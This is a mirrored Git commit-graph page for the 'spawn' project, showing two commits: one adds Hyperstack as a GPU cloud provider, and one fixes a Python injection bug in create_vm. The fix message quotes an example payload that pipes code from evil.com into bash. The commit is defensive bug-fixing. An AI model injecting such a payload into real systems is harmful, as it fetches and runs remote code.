spawn

vrr/spawn

Fork 0

mirror of https://github.com/OpenRouterTeam/spawn.git synced 2026-05-11 21:40:48 +00:00

Commit graph

Author	SHA1	Message	Date
A	3fe9f298db	fix: Prevent Python injection in Hyperstack create_vm via stdin (#175 ) The create_vm function interpolated $environment (HYPERSTACK_ENVIRONMENT env var or user prompt) and $image (HYPERSTACK_IMAGE env var) directly into Python code using single-quote string literals. An attacker who controls these env vars could break out of the string and execute arbitrary Python code (e.g., os.system('curl evil.com\|bash')). Fix: Pass all values via stdin to Python instead of shell interpolation. This eliminates the injection vector entirely, matching the pattern used to fix similar issues in other providers (Scaleway, UpCloud, etc.). Agent: security-auditor Co-authored-by: A <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>	2026-02-10 07:39:10 -08:00
A	8c5933c8e5	feat: Add Hyperstack GPU cloud provider (#173 ) Add Hyperstack (formerly NexGen Cloud) as a new cloud provider with: - REST API integration via infrahub-api.nexgencloud.com/v1 - Competitive GPU pricing (RTX A6000 at $0.50/hr on-demand) - Pay-per-minute billing for flexible workloads - Global environments across multiple regions Implemented agents: - claude (Claude Code) - aider (AI pair programming) - openclaw (multi-channel AI assistant) Added 14 matrix entries (3 implemented, 11 missing). Agent: cloud-scout-2 Co-authored-by: B <6723574+louisgv@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>	2026-02-10 07:18:56 -08:00

Author

SHA1

Message

Date

3fe9f298db

fix: Prevent Python injection in Hyperstack create_vm via stdin (#175 )

The create_vm function interpolated $environment (HYPERSTACK_ENVIRONMENT
env var or user prompt) and $image (HYPERSTACK_IMAGE env var) directly
into Python code using single-quote string literals. An attacker who
controls these env vars could break out of the string and execute
arbitrary Python code (e.g., os.system('curl evil.com|bash')).

Fix: Pass all values via stdin to Python instead of shell interpolation.
This eliminates the injection vector entirely, matching the pattern used
to fix similar issues in other providers (Scaleway, UpCloud, etc.).

Agent: security-auditor

Co-authored-by: A <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>

2026-02-10 07:39:10 -08:00

8c5933c8e5

feat: Add Hyperstack GPU cloud provider (#173 )

Add Hyperstack (formerly NexGen Cloud) as a new cloud provider with:
- REST API integration via infrahub-api.nexgencloud.com/v1
- Competitive GPU pricing (RTX A6000 at $0.50/hr on-demand)
- Pay-per-minute billing for flexible workloads
- Global environments across multiple regions

Implemented agents:
- claude (Claude Code)
- aider (AI pair programming)
- openclaw (multi-channel AI assistant)

Added 14 matrix entries (3 implemented, 11 missing).

Agent: cloud-scout-2

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>

2026-02-10 07:18:56 -08:00

2 commits